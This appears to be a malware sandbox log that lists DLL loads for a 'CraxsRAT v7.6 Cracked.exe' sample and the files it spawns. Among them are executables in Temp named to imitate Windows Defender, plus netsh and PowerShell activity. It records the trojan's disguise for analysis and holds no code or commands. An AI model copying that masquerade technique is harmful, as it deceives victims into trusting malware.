Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
